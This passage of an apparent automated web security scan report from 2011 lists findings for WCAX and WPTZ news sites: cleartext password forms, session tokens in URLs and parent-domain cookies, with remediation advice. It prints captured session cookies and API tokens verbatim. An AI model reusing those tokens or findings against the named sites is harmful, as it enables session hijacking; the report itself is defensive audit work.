Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=a86813bdf156af37a69a3bdc7834aea8; __utmz=176143781.1302352254.1.1.utmcsr=wcax.com|utmccn=(referral)|utmcmd=referral|utmcct=/Global/category.asp; __utma=176143781.1407274445.1302352252.1302352252.1302352252.1; __utmc=176143781; __utmb=176143781.1.10.1302352252

Response

HTTP/1.1 404 Not Found
Date: Sat, 09 Apr 2011 12:28:25 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_perl/2.0.4 Perl/v5.8.8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Content-Length: 15321


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com
...[SNIP]...
<div id="lEdirectory" class="isVisible">
               <form name="login" method="post" action="http://www.vermontopia.com/members/login.php">
                   
<input type="hidden" name="destiny" value="http://www.vermontopia.com/profile/" />
...[SNIP]...
</label>
       <input type="password" autocomplete="off" name="password" id="password" value="" />
                   <span class="automaticLogin">
...[SNIP]...

3.5. http://www.wcax.com/global/PM/registration.asp  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wcax.com
Path:   /global/PM/registration.asp

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password fields:

Request

GET /global/PM/registration.asp?L=104054&function=manageprofile&mode=create&referrer=http%3A//www.wcax.com/Global/link.asp%3FL%3D398823&referrerDomain=www.wcax.com HTTP/1.1
Host: www.wcax.com
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/global/link.asp?L=104054&function=manageprofile&mode=create&referrer=http%3A//www.wcax.com/Global/link.asp%3FL%3D398823
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ClientGroup=1; __qca=P0-1094680209-1302352442492; WT_FPC=id=20d5f21d8a4972ac84d1302352164716:lv=1302352695263:ss=1302352164716

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
WN: iis57
P3P: CP="CAO ADMa DEVa TAIa CONi OUR OTRi IND PHY ONL UNI COM NAV INT DEM PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
ntCoent-Length: 36961
Expires: Sat, 09 Apr 2011 12:38:22 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 09 Apr 2011 12:38:22 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: EmailAddress=; expires=Mon, 09-Apr-2001 12:38:22 GMT; path=/
Set-Cookie: FirstName=; expires=Mon, 09-Apr-2001 12:38:22 GMT; path=/
Set-Cookie: UserName=; expires=Mon, 09-Apr-2001 12:38:22 GMT; path=/
Set-Cookie: REGISTRATION=; expires=Mon, 09-Apr-2001 12:38:22 GMT; path=/
Set-Cookie: SuppliedProfileFields=; expires=Mon, 09-Apr-2001 12:38:22 GMT; path=/
Content-Length: 36961


<html>
<head id="Head1"><title>
   Create Account
</title><link href="mem.css" type="text/css" rel="STYLESHEET" />
<script language="javascript" src="/global/interface/jq.js" type="text/javasc
...[SNIP]...
<div id="MainDiv">
<form name="form1" method="post" action="UserProfile.aspx?L=104054&amp;function=manageprofile&amp;mode=create&amp;referrer=http%3a%2f%2fwww.wcax.com%2fGlobal%2flink.asp%3fL%3d398823&amp;referrerDomain=www.wcax.com" id="form1" onsubmit="return Validate();">
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTkwMjU2NDE0NQ9kFgICAw9kFhACAQ8WAh4EVGV4dAXIATxzY3JpcHQgdHlwZT0idGV4dC9qYXZhc2NyaXB0IiBsYW5ndWFnZT0iamF2YXNjcmlwdCI+CjwhLS0KdmF
...[SNIP]...
<br />
<input id="Password" type="password" maxLength="60" size="32" name="Password" value="" />
</td>
...[SNIP]...
<br />
<input id="VerifyPassword" type="password" maxLength="60" size="32" name="VerifyPassword" value="" />
</td>
...[SNIP]...

4. Session token in URL  previous  next
There are 5 instances of this issue:

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.


4.1. http://clientapps.kickapps.com/hearst/comments/cnr_100plus.php  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://clientapps.kickapps.com
Path:   /hearst/comments/cnr_100plus.php

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /hearst/comments/cnr_100plus.php?id=http://www.wptz.com/news/27483035/detail.html&d=The+head+of+the+Vermont+National+Guard+says+a+federal+shutdown+would+put+around+400+members+on+furlough+and+hundreds+more+working+but+unsure+when+they+would+be+paid.&n=Guard+Prepares+For+Possible+Federal+Shutdown&as=62976&tzAbbr=EST&pSize=&dName=&loginAtBottom= HTTP/1.1
Host: clientapps.kickapps.com
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/news/27483035/detail.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 09 Apr 2011 12:31:07 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Vary: Host,Accept-Encoding
Cache-Control: max-age=1
Expires: Sat, 09 Apr 2011 12:31:08 GMT
P3P: policyref="http://www.yuku.com/w3c/p3p.xml", CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa HISa OUR NOR IND PHY ONL UNI COM NAV INT DEM PRE LOC"
Content-Length: 87675

var ka_version_number = "1.71";
var ka_external_url = "http%3A%2F%2Fwww.wptz.com%2Fnews%2F27483035%2Fdetail.html";
var ka_adminUser = 'wptz';
var ka_commentsList = "";
var ka_as = "62976";
var ka_totS
...[SNIP]...
<div id="ka_singlesignon_text">Or <a class="rpxnow" onclick="RPXNOW.show(); return false;" href="https://mylogin.rpxnow.com/openid/v2/signin?token_url=http://ulocal.wptz.com/user/userLoginRPX.kickAction%3Fas%3D62976%26redirectURL%3D'+pageUrl+'" title="Third Party Login">log in using another provider</a>
...[SNIP]...
<div id="ka_singlesignon_image"><a class="rpxnow" onclick="RPXNOW.show(); return false;" href="https://mylogin.rpxnow.com/openid/v2/signin?token_url=http://ulocal.wptz.com/user/userLoginRPX.kickAction%3Fas%3D62976%26redirectURL%3D'+pageUrl+'" title="Third Party Login"><img src="http://clientapps.kickapps.com/hearst/comments/images/sso_logos.png"/>
...[SNIP]...

4.2. http://nmp.newsgator.com/NGBuzz/buzz.ashx  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://nmp.newsgator.com
Path:   /NGBuzz/buzz.ashx

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /NGBuzz/buzz.ashx?buzzId=216931&apiToken=291A707AAEE04CCC9A00B3B498001025 HTTP/1.1
Host: nmp.newsgator.com
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/index.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="ALL DSP COR CUR IVDo OUR BUS UNI"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Compressed-By: HttpCompress
Last-Modified: Mon, 31 Jan 2011 21:23:25 GMT
ETag: 634320806054306710
Vary: Accept-Encoding
Content-Type: text/javascript; charset=utf-8
Cache-Control: public, max-age=478
Date: Sat, 09 Apr 2011 12:29:45 GMT
Connection: close
Content-Length: 11208

try{var buzzTemplate_216931="{if LoadScript(NGBaseUrl+\"HOST/\"+OrgCode+\"/js/jquery.min.js\", \"window.jQuery != null\") }\n{if location.hostname==\"hosted.newsgator.com\"}\n{eval}\n LoadCSS(\"http:
...[SNIP]...

4.3. https://www.google.com/accounts/Captcha  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.google.com
Path:   /accounts/Captcha

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /accounts/Captcha?ctoken=ecOWC89KIyylmDv-PSxGhtgRFB59uJBi-gg9_wef1O7A3iNHXjWzdFV9AqlKTWXgEXEDOzze2sWjo8VH38xGHw%3AzTcajSXRS-JjUUHMjFOUQA HTTP/1.1
Host: www.google.com
Connection: keep-alive
Referer: https://www.google.com/accounts/NewAccount?continue=https%3A%2F%2Fwww.google.com%2Fanalytics%2Fsiteopt%2F%3Fet%3Dreset%26hl%3Den&hl=en&service=websiteoptimizer
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=173272373.1323948636.1302308457.1302308457.1302308457.1; __utmb=173272373.1.10.1302308457; __utmc=173272373; __utmz=173272373.1302308457.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); GALX=Zc_kKjCxArA; GoogleAccountsLocale_session=en; PREF=ID=e01b203a99971f0c:U=d212295d0f1573ee:FF=0:TM=1301786785:LM=1301836821:S=AJ4YE05fu5cLNNZE; NID=45=2n0e1W5_MaAh41CXKSdoaXqu35vMbjiifVyRtn1DMBwVJbE13IvcMlZIDijsF8MaTOfxdNQyHiFXdBnEPtokSQyvX00Wk2NFdxWix3dMOgE1UIQOzRT2_vJoVC6naACD

Response

HTTP/1.1 200 OK
Content-Type: image/jpeg
Content-Length: 2930
Date: Sat, 09 Apr 2011 00:21:09 GMT
Expires: Sat, 09 Apr 2011 00:21:09 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE

......JFIF..............6019dfafa6e6e209....C...........        .
................... $.' ",#..(7),01444.'9=82<.342...C.            .....2!.!22222222222222222222222222222222222222222222222222......F....".........
...[SNIP]...

4.4. https://www.google.com/accounts/NewAccount  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.google.com
Path:   /accounts/NewAccount

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /accounts/NewAccount?continue=https%3A%2F%2Fwww.google.com%2Fanalytics%2Fsiteopt%2F%3Fet%3Dreset%26hl%3Den&hl=en&service=websiteoptimizer HTTP/1.1
Host: www.google.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=173272373.1323948636.1302308457.1302308457.1302308457.1; __utmb=173272373.1.10.1302308457; __utmc=173272373; __utmz=173272373.1302308457.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); GALX=Zc_kKjCxArA; GoogleAccountsLocale_session=en; PREF=ID=e01b203a99971f0c:U=d212295d0f1573ee:FF=0:TM=1301786785:LM=1301836821:S=AJ4YE05fu5cLNNZE; NID=45=2n0e1W5_MaAh41CXKSdoaXqu35vMbjiifVyRtn1DMBwVJbE13IvcMlZIDijsF8MaTOfxdNQyHiFXdBnEPtokSQyvX00Wk2NFdxWix3dMOgE1UIQOzRT2_vJoVC6naACD

Response

HTTP/1.1 200 OK
Set-Cookie: GoogleAccountsLocale_session=en; Secure
Content-Type: text/html; charset=UTF-8
Cache-control: no-cache, no-store
Pragma: no-cache
Expires: Mon, 01-Jan-1990 00:00:00 GMT
Date: Sat, 09 Apr 2011 00:21:06 GMT
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Content-Length: 71211

<html><head><title>Google Accounts</title>
<style type="text/css">
body {font-family: arial,sans-serif;}
.body {margin: 0 15px; }

div.errorbox-good {}

div.errorbox-bad {}


...[SNIP]...
<div><img src="https://www.google.com/accounts/Captcha?ctoken=I-sHbDZbzZOycbhqbEy98l41TaMDrVw5gCcE4cfQNTOblKxx6MAFyhfUElK9PMLrk8dDOmi1iNr1qO-oS0lurg%3APQb2M-RWN9gEcfoqN7XOLw" width="200" height="70" alt="Visual verification"></div>
...[SNIP]...
<noscript><a href="https://www.google.com/accounts/Captcha?ctoken=LeWT_hBm_6MxaFBX7MrLgTxjcJ5K3ehKU1A8c5PMkK8fubjtpjcq2fbHnJBJNQiJd9g4kFAvFJC1gtNiBWIk1A%3ANYr2uhZOPE9XSQr3g6x-XA" target="_blank"><img src="https://www.google.com/accounts/accessibility.gif" border="0" style="width: 1em; height: 1.2em;" align="absmiddle" alt="Listen and type the numbers you hear">
...[SNIP]...

4.5. http://www.wptz.com/index.html  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.wptz.com
Path:   /index.html

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /index.html HTTP/1.1
Host: www.wptz.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: alpha=65ce8f18a56e00003751a04dcb780000ea280400

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Content-Type: text/html
X-IBS-CCDS-VERSION: 2.16.16
Vary: Accept-Encoding
X-IBS-CCDS-ORIGIN: origin126
X-Flow: xslt-in-production
Cache-Control: max-age=324
Expires: Sat, 09 Apr 2011 12:35:07 GMT
Date: Sat, 09 Apr 2011 12:29:43 GMT
Connection: close
Content-Length: 154822

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/
...[SNIP]...
<div class="sectionwidget2">


<script src="http://nmp.newsgator.com/NGBuzz/buzz.ashx?buzzId=216931&apiToken=291A707AAEE04CCC9A00B3B498001025" type="text/javascript"></script>
...[SNIP]...

5. Cookie scoped to parent domain  previous  next
There are 155 instances of this issue:

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.


5.1. http://api.twitter.com/1/WCAX_DAN/lists/wcaxweather/statuses.json  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://api.twitter.com
Path:   /1/WCAX_DAN/lists/wcaxweather/statuses.json

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /1/WCAX_DAN/lists/wcaxweather/statuses.json?callback=TWTR.Widget.receiveCallback_1&include_rts=true&clientsource=TWITTERINC_WIDGET&1302352244311=cachebust HTTP/1.1
Host: api.twitter.com
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/category.asp?C=18196
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: k=173.193.214.243.1301787648483845; guest_id=130178764848732008; __utmz=43838368.1301796978.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=43838368.745502295.1301796978.1301796978.1301796978.1; __utmv=43838368.lang%3A%20en

Response

HTTP/1.1 200 OK
Date: Sat, 09 Apr 2011 12:30:51 GMT
Server: hi
Status: 200 OK
X-Transaction: 1302352251-30597-14967
X-RateLimit-Limit: 150
ETag: "350bcab9704451c63ab3f21f69a9eb28"-gzip
Last-Modified: Sat, 09 Apr 2011 12:30:51 GMT
X-RateLimit-Remaining: 148
X-Runtime: 0.02792
X-Transaction-Mask: a6183ffa5f8ca943ff1b53b5644ef114
Content-Type: application/json; charset=utf-8
Pragma: no-cache
X-RateLimit-Class: api
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-RateLimit-Reset: 1302355850
Set-Cookie: original_referer=ZLhHHTiegr%2B46kQmsSCcdY9PeWer8JTdK72MdNqjnztsHEcgBgUBxCkZolWwyxPA; path=/
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCCBJPjovAToHaWQiJTdhYWFkN2QzZGMzMzVk%250ANGIwNGFjZjllZjhmZTA2YTQ5IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--e2f772c7bb1d7130fafe5220eaad1a5066753ead; domain=.twitter.com; path=/; HttpOnly
Vary: Accept-Encoding
Connection: close
Content-Length: 37156

TWTR.Widget.receiveCallback_1([{"in_reply_to_user_id_str":null,"id_str":"56489775208730624","text":"Spring is here to stay! Chance for a few showers late Sunday, then 70s on Monday. Have a great weeke
...[SNIP]...

5.2. http://api.twitter.com/1/WCAX_Dan%20/lists/wcaxnews/statuses.json  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://api.twitter.com
Path:   /1/WCAX_Dan%20/lists/wcaxnews/statuses.json

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /1/WCAX_Dan%20/lists/wcaxnews/statuses.json?callback=TWTR.Widget.receiveCallback_1&include_rts=true&clientsource=TWITTERINC_WIDGET&1302352449219=cachebust HTTP/1.1
Host: api.twitter.com
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/category.asp?C=18197
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: k=173.193.214.243.1301787648483845; guest_id=130178764848732008; __utmz=43838368.1301796978.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=43838368.745502295.1301796978.1301796978.1301796978.1; __utmv=43838368.lang%3A%20en; original_referer=ZLhHHTiegr%2B46kQmsSCcdY9PeWer8JTdK72MdNqjnztsHEcgBgUBxCkZolWwyxPA; _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCLxHPjovASIKZmxhc2hJQzonQWN0aW9uQ29u%250AdHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoHaWQiJWI5%250AZDY2MTEyNzEzYzI5MWVkOGM5ZDNiMDU4OWUxNGM0--68456826b804732decc9adcd874144bfe8409462

Response

HTTP/1.1 200 OK
Date: Sat, 09 Apr 2011 12:34:16 GMT
Server: hi
Status: 200 OK
X-Transaction: 1302352456-97362-51984
X-RateLimit-Limit: 150
ETag: "9c56bdc9d348f90ccc8f5b3abd425756"-gzip
Last-Modified: Sat, 09 Apr 2011 12:34:16 GMT
X-RateLimit-Remaining: 60
X-Runtime: 0.03948
X-Transaction-Mask: a6183ffa5f8ca943ff1b53b5644ef114
Content-Type: application/json; charset=utf-8
Pragma: no-cache
X-RateLimit-Class: api
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-RateLimit-Reset: 1302355850
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCLxHPjovAToHaWQiJWI5ZDY2MTEyNzEzYzI5%250AMWVkOGM5ZDNiMDU4OWUxNGM0IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--3fca1ebd2ebf0edc779f5abbed3918788126099a; domain=.twitter.com; path=/; HttpOnly
Vary: Accept-Encoding
Connection: close
Content-Length: 33728

TWTR.Widget.receiveCallback_1([{"in_reply_to_user_id_str":null,"id_str":"56526851723640833","text":"#vt company goes from roadside stand to multi-million $ biz: http:\/\/www.wcax.com\/global\/story.as
...[SNIP]...

5.3. http://a.rfihub.com/cm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.rfihub.com
Path:   /cm

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /cm?id=CAESEPxOsKR978Hu13ThKmL5OJM&cver=1&forward= HTTP/1.1
Host: a.rfihub.com
Proxy-Connection: keep-alive
Referer: http://a.rfihub.com/sed?w=300&h=250&re=12387&pv=0&ra=3525255080.7230796942021698&rb=445&ca=&rc=10.2&rd=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%253Fsa%253Dl%2526ai%253DBKgktkFKgTfjNO6X6lAfi7omAC6-TxYsCj9qbsyK3zOLcHAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi0yMTAzNTUzODUzMDgyNjAzoAGz7MfrA7IBDHd3dy53Y2F4LmNvbboBCjMwMHgyNTBfYXPIAQnaAS9odHRwOi8vd3d3LndjYXguY29tL0dsb2JhbC9jYXRlZ29yeS5hc3A_Qz0xODgzNpgC8hHAAgTIAs3vzw6oAwHoAxDoA9Qq6APnAvUDAAAARPUDIAAAAIAGo6es8NStl8O_AQ%2526num%253D1%2526sig%253DAGiWqtwsnfDOzRnIRJLXiZuNn2CCD9KiLg%2526client%253Dca-pub-2103553853082603%2526adurl%253D&ua=&ub=&uc=&ud=&ue=&pa=ppre352525508247&pb=&pc=&pd=&pg=&ct=1302352525508&co=false&ep=TaBSkAAO5vgK5T0lsAJ3YlpV74vOvScCMvR4kw&ri=4da052900ee6f8ae53d25b0277621&rs=&ai=9530&rt=10261&pe=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Fpagead%2Fads%3Fclient%3Dca-pub-2103553853082603%26output%3Dhtml%26h%3D250%26slotname%3D8163847123%26w%3D300%26lmt%3D1302370522%26flash%3D10.2.154%26url%3Dhttp%253A%252F%252Fwww.wcax.com%252FGlobal%252Fcategory.asp%253FC%253D18836%26dt%3D1302352522769%26bpp%3D3%26shv%3Dr20110330%26jsv%3Dr20110321-2%26correlator%3D1302352522793%26frm%3D0%26adk%3D2815960337%26ga_vid%3D983270927.1302352523%26ga_sid%3D1302352523%26ga_hid%3D1867116075%26ga_fc%3D0%26u_tz%3D-300%26u_his%3D3%26u_java%3D1%26u_h%3D1200%26u_w%3D1920%26u_ah%3D1156%26u_aw%3D1920%26u_cd%3D16%26u_nplug%3D9%26u_nmime%3D44%26biw%3D1063%26bih%3D1038%26ref%3Dhttp%253A%252F%252Fwww.wcax.com%252FGlobal%252Fcategory.asp%253FC%253D18963%26fu%3D0%26ifi%3D1%26dtd%3D103%26xpc%3DmxzeQN3016%26p%3Dhttp%253A%2F%2Fwww.wcax.com&pf=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: g="aABsHUtkw==A-ac0ldxTL_CNwb|9530|84152|361230|12352|824|99188|445|38387|6613AAABLzpChvw="; u="aABnAgfAg==AI89bBrQ==AAABLzpChvs="; f="aABnVdpdA==AK1302352529AB1AAABLzpChvo="; s="aAC7sFUPw==AE9479AN1294103956000AAABLzpChvo=AE8438AN1275963655000AAABLzpChvo="; e=cd; a=c369576644441445519; j=c369576644441445519; o=1-DIhc6MPrMFqM; p=1-DIhc6MPrMFqM; r=1302352529146

Response

HTTP/1.1 200 OK
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: a1=1CAESEPxOsKR978Hu13ThKmL5OJM;Path=/;Domain=.rfihub.com;Expires=Fri, 04-Apr-31 12:35:33 GMT
Set-Cookie: j1=1CAESEPxOsKR978Hu13ThKmL5OJM;Path=/;Domain=.rfihub.com
Content-Type: image/gif
Content-Length: 42
Set-Cookie: t=1302352533150;Path=/;Domain=.rfihub.com;Expires=Fri, 04-Apr-31 12:35:33 GMT
Set-Cookie: u="aABnAnSVw==AI89bBrQ==AAABLzpClp4=";Path=/;Domain=.rfihub.com;Expires=Mon, 08-Oct-12 12:35:33 GMT
Set-Cookie: e=cd;Path=/;Domain=.rfihub.com;Expires=Mon, 08-Oct-12 12:35:33 GMT
Set-Cookie: a=c369576644441445519;Path=/;Domain=.rfihub.com;Expires=Fri, 04-Apr-31 12:35:33 GMT
Set-Cookie: j=c369576644441445519;Path=/;Domain=.rfihub.com
Set-Cookie: o=1-DIhc6MPrMFqM;Path=/;Domain=.rfihub.com;Expires=Fri, 04-Apr-31 12:35:33 GMT
Set-Cookie: p=1-DIhc6MPrMFqM;Path=/;Domain=.rfihub.com
Set-Cookie: r=1302352529146;Path=/;Domain=.rfihub.com;Expires=Fri, 04-Apr-31 12:35:33 GMT

GIF89a.............!.......,........@..D.;

5.4. http://a.rfihub.com/cm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.rfihub.com
Path:   /cm

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /cm?apxuid=8663496762294337265&forward= HTTP/1.1
Host: a.rfihub.com
Proxy-Connection: keep-alive
